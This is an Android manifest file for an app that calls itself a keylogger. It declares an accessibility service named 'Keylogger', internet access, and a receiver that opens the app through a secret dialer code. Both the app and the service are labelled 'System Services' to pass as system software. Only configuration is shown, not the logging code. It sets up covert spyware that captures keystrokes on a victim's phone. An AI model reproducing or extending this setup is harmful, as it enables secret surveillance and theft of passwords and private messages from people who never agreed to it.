<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="mr.programmerlab.androidkeylogger">

    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE"/>

    <application
        android:allowBackup="false"
        android:fullBackupContent="false"
        android:icon="@mipmap/ic_launcher_round"
        android:label="System Services"
        android:roundIcon="@mipmap/ic_launcher_round"
        android:screenOrientation="portrait"
        android:supportsRtl="true"
        android:theme="@style/AppTheme.NoActionBar">
        <service
            android:name=".MyService"
            android:enabled="true"
            android:exported="true" />

        <activity android:name="com.mr.programmerlab.androidkeylogger.Splash">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />

                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity
            android:name="com.mr.programmerlab.androidkeylogger.MainActivity"
            android:label="Services" />
        <activity
            android:name="com.mr.programmerlab.androidkeylogger.About"
            android:label="About" />

        <receiver android:name="com.mr.programmerlab.androidkeylogger.dialer">
            <intent-filter>
                <action android:name="android.provider.Telephony.SECRET_CODE" />

                <data
                    android:host="74845"
                    android:scheme="android_secret_code" />
            </intent-filter>
        </receiver>

        <service
            android:name="com.mr.programmerlab.androidkeylogger.Keylogger"
            android:label="System Services"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService" />
            </intent-filter>

            <meta-data
                android:name="android.accessibilityservice"
                android:resource="@xml/accessibility_service_config" />
        </service>
    </application>

</manifest>